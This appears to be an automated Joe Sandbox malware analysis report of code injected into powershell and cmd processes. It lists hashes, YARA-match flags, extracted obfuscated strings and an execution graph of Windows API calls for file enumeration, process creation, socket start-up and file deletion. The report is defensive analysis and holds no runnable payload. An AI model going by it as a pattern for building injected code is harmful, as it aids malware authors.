                                                                        • Instruction ID: af860aac1bf456792ba076c195c149f94ca962b7adf198bf8846dc60a6ab0cdf
                                                                        • Opcode Fuzzy Hash: dbf596f7c63f573f1355239edf5f601fc4b70bc13d8113f27cb44776ac46e7ba
                                                                        • Instruction Fuzzy Hash: 5BD117B1B04215DFCB148B68C855A6ABBF2BFC9320F14C46AD9299B391CB32DC45C7A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$4'qq$4'qq
                                                                        • API String ID: 0-4257899170
                                                                        • Opcode ID: 2b3de66aaa12d1f0bf6f9c06dbc73d0b7fbc9d9b4eaa76c0e4c8759a64a7e2bd
                                                                        • Instruction ID: dd9b053dba03ba049a035f6435650b8ac050ace56953973079bbd1fe01827835
                                                                        • Opcode Fuzzy Hash: 2b3de66aaa12d1f0bf6f9c06dbc73d0b7fbc9d9b4eaa76c0e4c8759a64a7e2bd
                                                                        • Instruction Fuzzy Hash: B2F16EB4A00228DFCB14DB54C844BAEBBB2BBC8305F5084A5D6096F385CB76AD85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $qq$$qq$$qq$$qq
                                                                        • API String ID: 0-3704488771
                                                                        • Opcode ID: 2289b0f5c4f774b9673b558602eeb71d01493c5e367b1f386b51294945e5ffab
                                                                        • Instruction ID: c9205636e0501149189b141b0c3aeae8a0968fd9841effb622c0d4a0a4843237
                                                                        • Opcode Fuzzy Hash: 2289b0f5c4f774b9673b558602eeb71d01493c5e367b1f386b51294945e5ffab
                                                                        • Instruction Fuzzy Hash: 4B2147B13003129FDF34562A8800727AAE69BC4715F38983ADD59CB385DE37D8418361
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq$$qq$$qq
                                                                        • API String ID: 0-2004584679
                                                                        • Opcode ID: bd66d63934f8338d351fa83760f9a0c38696c1850dc1641726e4bca825ee0eef
                                                                        • Instruction ID: c52f373f7539b723c78d77bf521491f28f1a58ad0979bcf7602851ffdbb5e6b0
                                                                        • Opcode Fuzzy Hash: bd66d63934f8338d351fa83760f9a0c38696c1850dc1641726e4bca825ee0eef
                                                                        • Instruction Fuzzy Hash: 4301F7B071D3979BC726422808202A6ABB29FC3551F3900EBC655DB287CE268C4A9393
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage: 2.3%
                                                                        Dynamic/Decrypted Code Coverage: 0%
                                                                        Signature Coverage: 7.8%
                                                                        Total number of Nodes: 411
                                                                        Total number of Limit Nodes: 62
                                                                        execution_graph 94068 2840480 94069 284049a 94068->94069 94074 2843e60 94069->94074 94071 28404b8 94072 28404ec PostThreadMessageW 94071->94072 94073 28404fd 94071->94073 94072->94073 94075 2843e84 94074->94075 94076 2843e8b 94075->94076 94077 2843ec0 LdrLoadDll 94075->94077 94076->94071 94077->94076 94078 284b880 94080 284b8a9 94078->94080 94079 284b9ad 94080->94079 94081 284b953 FindFirstFileW 94080->94081 94081->94079 94083 284b96e 94081->94083 94082 284b994 FindNextFileW 94082->94083 94084 284b9a6 FindClose 94082->94084 94083->94082 94084->94079 94085 2846800 94086 284681c 94085->94086 94094 284686f 94085->94094 94086->94094 94095 2857a10 94086->94095 94087 2846998 94089 2846837 94098 2845c10 NtClose LdrInitializeThunk 94089->94098 94091 2846972 94091->94087 94100 2845de0 NtClose LdrInitializeThunk LdrInitializeThunk 94091->94100 94094->94087 94099 2845c10 NtClose LdrInitializeThunk 94094->94099 94096 2857a2a 94095->94096 94097 2857a3b NtClose 94096->94097 94097->94089 94098->94094 94099->94091 94100->94087 94101 284f240 94102 284f25d 94101->94102 94103 2843e60 LdrLoadDll 94102->94103 94104 284f27b 94103->94104 94105 28503c1 94117 2857890 94105->94117 94107 28503e2 94108 2850415 94107->94108 94109 2850400 94107->94109 94111 2857a10 NtClose 94108->94111 94110 2857a10 NtClose 94109->94110 94112 2850409 94110->94112 94114 285041e 94111->94114 94113 285044a 94114->94113 94121 2859920 94114->94121 94118 2857929 94117->94118 94120 28578b1 94117->94120 94119 285793f NtReadFile 94118->94119 94119->94107 94120->94107 94124 2857d70 94121->94124 94123 285043e 94125 2857d8d 94124->94125 94126 2857d9e RtlFreeHeap 94125->94126 94126->94123 94127 3142ad0 LdrInitializeThunk 94128 2857040 94129 285705d 94128->94129 94132 3142df0 LdrInitializeThunk 94129->94132 94130 2857085 94132->94130 94133 2850840 94134 285085c 94133->94134 94135 2850884 94134->94135 94136 2850898 94134->94136 94137 2857a10 NtClose 
94135->94137 94138 2857a10 NtClose 94136->94138 94139 285088d 94137->94139 94140 28508a1 94138->94140 94143 2859a40 RtlAllocateHeap 94140->94143 94142 28508ac 94143->94142 94149 2842a8c 94154 28471c0 94149->94154 94152 2857a10 NtClose 94153 2842ab1 94152->94153 94155 28471da 94154->94155 94159 2842a9c 94154->94159 94160 2857130 94155->94160 94158 2857a10 NtClose 94158->94159 94159->94152 94159->94153 94161 285714a 94160->94161 94164 31435c0 LdrInitializeThunk 94161->94164 94162 28472aa 94162->94158 94164->94162 94165 284210a 94166 2842138 94165->94166 94169 2845980 94166->94169 94168 2842143 94170 28459b3 94169->94170 94171 28459d7 94170->94171 94176 28575a0 94170->94176 94171->94168 94173 28459fa 94173->94171 94174 2857a10 NtClose 94173->94174 94175 2845a7a 94174->94175 94175->94168 94177 28575bd 94176->94177 94180 3142ca0 LdrInitializeThunk 94177->94180 94178 28575e9 94178->94173 94180->94178 94181 28393d0 94182 28393df 94181->94182 94183 2839420 94182->94183 94184 283940d CreateThread 94182->94184 94185 2845110 94190 2847540 94185->94190 94187 2845140 94189 284516c 94187->94189 94194 28474c0 94187->94194 94191 2847553 94190->94191 94201 2856fa0 94191->94201 94193 284757e 94193->94187 94195 2847504 94194->94195 94196 2847525 94195->94196 94207 2856da0 94195->94207 94196->94187 94198 2847515 94199 2847531 94198->94199 94200 2857a10 NtClose 94198->94200 94199->94187 94200->94196 94202 2857010 94201->94202 94203 2856fc1 94201->94203 94206 3142dd0 LdrInitializeThunk 94202->94206 94203->94193 94204 2857035 94204->94193 94206->94204 94208 2856e12 94207->94208 94209 2856dc4 94207->94209 94212 3144650 LdrInitializeThunk 94208->94212 94209->94198 94210 2856e37 94210->94198 94212->94210 94213 2854a10 94214 2854a6a 94213->94214 94216 2854a77 94214->94216 94217 28525c0 94214->94217 94219 2852601 94217->94219 94218 2852706 94218->94216 94219->94218 94220 2843e60 LdrLoadDll 94219->94220 94222 2852647 94220->94222 94221 2852680 Sleep 94221->94222 94222->94218 94222->94221 94223 
2850bd0 94227 2850bdf 94223->94227 94224 2850c69 94225 2850c23 94226 2859920 RtlFreeHeap 94225->94226 94228 2850c33 94226->94228 94227->94224 94227->94225 94229 2850c64 94227->94229 94230 2859920 RtlFreeHeap 94229->94230 94230->94224 94231 2847c1e 94232 2847c23 94231->94232 94233 2847be2 94232->94233 94235 2846650 LdrInitializeThunk LdrInitializeThunk 94232->94235 94235->94233 94236 2846a67 94237 28469f6 94236->94237 94239 2846a42 94236->94239 94237->94239 94240 284a5e0 94237->94240 94241 284a606 94240->94241 94242 284a825 94241->94242 94267 2857e00 94241->94267 94242->94239 94244 284a67c 94244->94242 94270 285ab30 94244->94270 94246 284a698 94246->94242 94247 284a769 94246->94247 94276 2857090 94246->94276 94250 2845090 LdrInitializeThunk 94247->94250 94255 284a788 94247->94255 94250->94255 94251 284a751 94256 2847540 LdrInitializeThunk 94251->94256 94252 284a72f 94298 2853260 LdrInitializeThunk 94252->94298 94253 284a6fd 94253->94242 94253->94251 94253->94252 94280 2845090 94253->94280 94254 284a80d 94261 2847540 LdrInitializeThunk 94254->94261 94255->94254 94283 2856c60 94255->94283 94260 284a75f 94256->94260 94260->94239 94263 284a81b 94261->94263 94262 284a7e4 94288 2856d00 94262->94288 94263->94239 94265 284a7fe 94293 2856e40 94265->94293 94268 2857e1a 94267->94268 94269 2857e2b CreateProcessInternalW 94268->94269 94269->94244 94271 285aaa0 94270->94271 94272 285aafd 94271->94272 94299 2859a00 94271->94299 94272->94246 94274 285aada 94275 2859920 RtlFreeHeap 94274->94275 94275->94272 94277 28570aa 94276->94277 94305 3142c0a 94277->94305 94278 284a6f4 94278->94247 94278->94253 94282 28450ce 94280->94282 94308 2857250 94280->94308 94282->94252 94284 2856ccf 94283->94284 94285 2856c81 94283->94285 94314 31439b0 LdrInitializeThunk 94284->94314 94285->94262 94286 2856cf4 94286->94262 94289 2856d72 94288->94289 94290 2856d24 94288->94290 94315 3144340 LdrInitializeThunk 94289->94315 94290->94265 94291 2856d97 94291->94265 94294 2856eaf 94293->94294 94296 2856e61 
94293->94296 94316 3142fb0 LdrInitializeThunk 94294->94316 94295 2856ed4 94295->94254 94296->94254 94298->94251 94302 2857d20 94299->94302 94301 2859a1b 94301->94274 94303 2857d3a 94302->94303 94304 2857d4b RtlAllocateHeap 94303->94304 94304->94301 94306 3142c11 94305->94306 94307 3142c1f LdrInitializeThunk 94305->94307 94306->94278 94307->94278 94309 28572ef 94308->94309 94311 2857271 94308->94311 94313 3142d10 LdrInitializeThunk 94309->94313 94310 2857334 94310->94282 94311->94282 94313->94310 94314->94286 94315->94291 94316->94295 94317 284a0e0 94322 2849e10 94317->94322 94319 284a0ed 94336 2849ab0 94319->94336 94321 284a109 94323 2849e35 94322->94323 94347 2847790 94323->94347 94326 2849f72 94326->94319 94328 2849f89 94328->94319 94329 2849f80 94329->94328 94331 284a071 94329->94331 94362 2849510 94329->94362 94333 284a0c9 94331->94333 94371 2849870 94331->94371 94334 2859920 RtlFreeHeap 94333->94334 94335 284a0d0 94334->94335 94335->94319 94337 2849ac6 94336->94337 94344 2849ad1 94336->94344 94338 2859a00 RtlAllocateHeap 94337->94338 94338->94344 94339 2849ae7 94339->94321 94340 2847790 GetFileAttributesW 94340->94344 94341 2849dde 94342 2849df7 94341->94342 94343 2859920 RtlFreeHeap 94341->94343 94342->94321 94343->94342 94344->94339 94344->94340 94344->94341 94345 2849510 RtlFreeHeap 94344->94345 94346 2849870 RtlFreeHeap 94344->94346 94345->94344 94346->94344 94348 28477b1 94347->94348 94349 28477c3 94348->94349 94350 28477b8 GetFileAttributesW 94348->94350 94349->94326 94351 2851ea0 94349->94351 94350->94349 94352 2851eae 94351->94352 94353 2851eb5 94351->94353 94352->94329 94354 2843e60 LdrLoadDll 94353->94354 94355 2851eea 94354->94355 94356 2851ef9 94355->94356 94375 2851970 LdrLoadDll 94355->94375 94358 2859a00 RtlAllocateHeap 94356->94358 94360 2852094 94356->94360 94361 2851f12 94358->94361 94359 2859920 RtlFreeHeap 94359->94360 94360->94329 94361->94359 94361->94360 94363 2849529 94362->94363 94376 284cd50 94363->94376 94365 284959d 94366 28495bb 
94365->94366 94368 2849720 94365->94368 94367 2849705 94366->94367 94381 28493d0 94366->94381 94367->94329 94368->94367 94369 28493d0 RtlFreeHeap 94368->94369 94369->94368 94372 2849896 94371->94372 94373 284cd50 RtlFreeHeap 94372->94373 94374 2849912 94373->94374 94374->94331 94375->94356 94378 284cd5b 94376->94378 94377 284cd73 94377->94365 94378->94377 94379 2859920 RtlFreeHeap 94378->94379 94380 284cdac 94379->94380 94380->94365 94382 28493e6 94381->94382 94385 284cdc0 94382->94385 94384 28494ec 94384->94366 94386 284cde4 94385->94386 94387 284ce7c 94386->94387 94388 2859920 RtlFreeHeap 94386->94388 94387->94384 94388->94387 94389 2849020 94390 2849027 94389->94390 94390->94389 94391 2849048 94390->94391 94392 2859920 RtlFreeHeap 94390->94392 94392->94391 94393 28451a0 94394 28451d6 94393->94394 94395 2857090 LdrInitializeThunk 94393->94395 94395->94394 94396 284e960 94397 284e9c4 94396->94397 94398 2845980 2 API calls 94397->94398 94400 284eaed 94398->94400 94399 284eaf4 94400->94399 94421 2845a90 94400->94421 94402 284eb70 94403 284eca2 94402->94403 94420 284ec93 94402->94420 94425 284e740 94402->94425 94404 2857a10 NtClose 94403->94404 94406 284ecac 94404->94406 94407 284eba5 94407->94403 94408 284ebb0 94407->94408 94409 2859a00 RtlAllocateHeap 94408->94409 94410 284ebd9 94409->94410 94411 284ebe2 94410->94411 94412 284ebf8 94410->94412 94413 2857a10 NtClose 94411->94413 94434 284e630 CoInitialize 94412->94434 94415 284ebec 94413->94415 94416 2857a10 NtClose 94417 284ec8c 94416->94417 94419 2859920 RtlFreeHeap 94417->94419 94418 284ec06 94418->94416 94419->94420 94422 2845ab5 94421->94422 94436 2857390 94422->94436 94426 284e75c 94425->94426 94427 2843e60 LdrLoadDll 94426->94427 94429 284e77a 94427->94429 94428 284e783 94428->94407 94429->94428 94430 2843e60 LdrLoadDll 94429->94430 94431 284e84e 94430->94431 94432 2843e60 LdrLoadDll 94431->94432 94433 284e8ab 94431->94433 94432->94433 94433->94407 94435 284e695 94434->94435 94435->94418 94437 28573aa 
94436->94437 94440 3142c60 LdrInitializeThunk 94437->94440 94438 2845b29 94438->94402 94440->94438 94441 2856ee0 94442 2856f64 94441->94442 94443 2856f04 94441->94443 94446 3142ee0 LdrInitializeThunk 94442->94446 94444 2856f95 94446->94444 94447 2839430 94448 28397fc 94447->94448 94449 2839c90 94448->94449 94451 2859590 94448->94451 94452 28595b6 94451->94452 94457 2833db0 94452->94457 94454 28595d5 94455 2859606 94454->94455 94461 2854050 94454->94461 94455->94449 94458 2833db7 94457->94458 94465 2842b90 94458->94465 94460 2833dbd 94460->94454 94462 28540aa 94461->94462 94464 28540b7 94462->94464 94476 2841040 94462->94476 94464->94455 94466 2842ba7 94465->94466 94468 2842bc0 94466->94468 94469 2858450 94466->94469 94468->94460 94471 2858468 94469->94471 94470 285848c 94470->94468 94471->94470 94472 2857090 LdrInitializeThunk 94471->94472 94473 28584e1 94472->94473 94474 2859920 RtlFreeHeap 94473->94474 94475 28584fa 94474->94475 94475->94468 94477 284107b 94476->94477 94494 28472d0 94477->94494 94479 2841083 94480 2859a00 RtlAllocateHeap 94479->94480 94492 2841352 94479->94492 94481 2841099 94480->94481 94482 2859a00 RtlAllocateHeap 94481->94482 94483 28410aa 94482->94483 94484 2859a00 RtlAllocateHeap 94483->94484 94486 28410bb 94484->94486 94493 284114e 94486->94493 94509 28460e0 NtClose LdrInitializeThunk LdrInitializeThunk 94486->94509 94487 2843e60 LdrLoadDll 94488 284130f 94487->94488 94489 284134c 94488->94489 94490 2841344 WSAStartup 94488->94490 94505 2856770 94489->94505 94490->94489 94492->94464 94493->94487 94495 28472fc 94494->94495 94496 28471c0 2 API calls 94495->94496 94497 284731f 94496->94497 94498 2847341 94497->94498 94499 2847329 94497->94499 94501 284735d 94498->94501 94503 2857a10 NtClose 94498->94503 94500 2847334 94499->94500 94502 2857a10 NtClose 94499->94502 94500->94479 94501->94479 94502->94500 94504 2847353 94503->94504 94504->94479 94506 28567ca 94505->94506 94508 28567d7 94506->94508 94510 2841370 94506->94510 94508->94492 
94509->94493 94524 28475a0 94510->94524 94512 2841875 94512->94508 94514 2841591 94515 285ab30 2 API calls 94514->94515 94518 28415a6 94515->94518 94516 2841390 94516->94512 94528 285aa00 94516->94528 94517 2847540 LdrInitializeThunk 94520 28415d1 94517->94520 94518->94520 94533 2840000 94518->94533 94520->94512 94520->94517 94521 2840000 LdrInitializeThunk 94520->94521 94521->94520 94522 28416ff 94522->94520 94523 2847540 LdrInitializeThunk 94522->94523 94523->94522 94525 28475ad 94524->94525 94526 28475d5 94525->94526 94527 28475ce SetErrorMode 94525->94527 94526->94516 94527->94526 94529 285aa16 94528->94529 94530 285aa10 94528->94530 94531 2859a00 RtlAllocateHeap 94529->94531 94530->94514 94532 285aa3c 94531->94532 94532->94514 94536 2857c90 94533->94536 94537 2857cad 94536->94537 94540 3142c70 LdrInitializeThunk 94537->94540 94538 2840022 94538->94522 94540->94538 94542 2846430 94543 284645a 94542->94543 94546 2847370 94543->94546 94545 2846484 94547 284738d 94546->94547 94553 2857180 94547->94553 94549 28473dd 94550 28473e4 94549->94550 94551 2857250 LdrInitializeThunk 94549->94551 94550->94545 94552 284740d 94551->94552 94552->94545 94554 2857210 94553->94554 94556 28571a4 94553->94556 94558 3142f30 LdrInitializeThunk 94554->94558 94555 2857249 94555->94549 94556->94549 94558->94555 94565 2857730 94566 28577d9 94565->94566 94568 2857755 94565->94568 94567 28577ef NtCreateFile 94566->94567 94569 2857970 94570 28579dc 94569->94570 94572 2857994 94569->94572 94571 28579f2 NtDeleteFile 94570->94571

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !<$$$)K$0u$6$;$<2$=POUSH$G$KE$O%$SH$SH$WS$]s$`$w$yP$_$p
                                                                        • API String ID: 0-2178543011
                                                                        • Opcode ID: 0af98ffd33cf2dcfc8b282559c9797877593fdd83a272eee870eff818dde17b6
                                                                        • Instruction ID: 0c497274d458568ede793ccce2242619dd75da04cae966107ae7e4f3a764a56e
                                                                        • Opcode Fuzzy Hash: 0af98ffd33cf2dcfc8b282559c9797877593fdd83a272eee870eff818dde17b6
                                                                        • Instruction Fuzzy Hash: 3D42D3B8D05229CBEB25CF49C894BDDBBB2BB44308F1081D9D50DAB380D7B95A85CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(?,00000000), ref: 0284B964
                                                                        • FindNextFileW.KERNELBASE(?,00000010), ref: 0284B99F
                                                                        • FindClose.KERNELBASE(?), ref: 0284B9AA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: c727bc2ddeb5e29e140db745ae10bd61aed2c37486d980a70e5e443c6427af0a
                                                                        • Instruction ID: 88d8bf6b97f16c3dfed5bd4f1c1b2cb32048682c019d063e570ebaf6414f1e0e
                                                                        • Opcode Fuzzy Hash: c727bc2ddeb5e29e140db745ae10bd61aed2c37486d980a70e5e443c6427af0a
                                                                        • Instruction Fuzzy Hash: 17316079900348ABDB21DF64CC85FFE777DAF44749F144458B908E7180EA70AA848BA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02857820
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 8dadb3bc4527515943091eb7cf00bee8138bee8c7c71347531a93ae71a79c292
                                                                        • Instruction ID: 862ea3a38d58df8cf7e20690cbf400a5c0a2896bee16031582fa6d39dccd7f9c
                                                                        • Opcode Fuzzy Hash: 8dadb3bc4527515943091eb7cf00bee8138bee8c7c71347531a93ae71a79c292
                                                                        • Instruction Fuzzy Hash: 2631C5B9A01218AFCB14DF99D880EEEB7B9EF8C714F108119FD09A3340D734A8518FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02857968
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: 9916b21b4bdda5fda80655f7d16c03d194ed0a1473cb53a12ead11b45d59ac18
                                                                        • Instruction ID: 09bd4e1a6a9cb1e4941a09a9ac5a4e8a6fe993c13407282d266f80b7fcf22856
                                                                        • Opcode Fuzzy Hash: 9916b21b4bdda5fda80655f7d16c03d194ed0a1473cb53a12ead11b45d59ac18
                                                                        • Instruction Fuzzy Hash: 2631BBB5A01219AFCB14DF59D880EEEB7B9EF8C714F108219FD19A7240D630A9118FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DeleteFile
                                                                        • String ID:
                                                                        • API String ID: 4033686569-0
                                                                        • Opcode ID: 962d2a74dab1214c9a1136aa92efa52dcb22f80298dc2a9c80ca7797dcda8cd9
                                                                        • Instruction ID: eb9b531b6c96aca32a52ef13b6da3f52b91ec4048c41c264fc595031edf6a1d1
                                                                        • Opcode Fuzzy Hash: 962d2a74dab1214c9a1136aa92efa52dcb22f80298dc2a9c80ca7797dcda8cd9
                                                                        • Instruction Fuzzy Hash: 1C01C47A6012147FD610EB68CC41FAB73ADDB89710F50450AFE0D97280DA74B9118BEA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02857A44
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2886614544.0000000002830000.00000040.80000000.00040000.00000000.sdmp, Offset: 02830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_2830000_cmd.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: e0e12dddc7c3dbd5bd9251f05ea33240a1d1119dea3cce8cc0d4523f01915727
                                                                        • Instruction ID: 154f0608e35d2a18d7b42372d1ab8fcdf6d09da577a6188be04954e1b82470d3
                                                                        • Opcode Fuzzy Hash: e0e12dddc7c3dbd5bd9251f05ea33240a1d1119dea3cce8cc0d4523f01915727
                                                                        • Instruction Fuzzy Hash: 65E0463A201214BBD620AA59CC40FDB776DDFC5721F018055FA19A7242CA70B9518AF5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
                                                                        • Instruction ID: 6ce7136e4b12826ea6027368ac87000907cde3bfe9e6673d0b11a4f4e842c8d0
                                                                        • Opcode Fuzzy Hash: 35322c4535df5dfb613ea35e5824f8be48f67eb7471b4b367eb487bb6142320d
                                                                        • Instruction Fuzzy Hash: 9A900231705804539140B2588984546400597E4301B55D011F4525554C8B148A565761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
                                                                        • Instruction ID: a8f606d087d01ce23ace9c0b1ff2d11b37bdbcc11f8642e00f721ae1e18f05f1
                                                                        • Opcode Fuzzy Hash: 55abb9e9806f3b7e0015fd5a4ca534697506dfd9dc523d8a18000dd11ad57126
                                                                        • Instruction Fuzzy Hash: 99900261701504834140B2588904406600597E5301395D115B4655560C871889559669
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
                                                                        • Instruction ID: b291600eb0caed8b045c0a975b2d439aa02b83063ae4520511945c832e0d3592
                                                                        • Opcode Fuzzy Hash: 8bccba315005a4016f7296b85ef344d4519867cd71ec9a4911b5a797e1d582e6
                                                                        • Instruction Fuzzy Hash: CF900261302404434105B2588514616400A87E4201B55D021F5115590DC72589916525
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
                                                                        • Instruction ID: 9aef443ac1db2e2968b40ad58808e6a454170c47b25ed9a6f3a3d06227842eb8
                                                                        • Opcode Fuzzy Hash: 4c699d53acfd8ffb7728ee0fc1a76758dbd76bc2feb1fba47104c07fb0d6ba4a
                                                                        • Instruction Fuzzy Hash: 59900435311404430105F75C47045070047C7DD351355D031F5117550CD731CD715531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000000C.00000002.2888305216.00000000030D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030D0000, based on PE: true
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031F9000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.00000000031FD000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 0000000C.00000002.2888305216.000000000326E000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_12_2_30d0000_cmd.jbxd
                                                                        Similarity
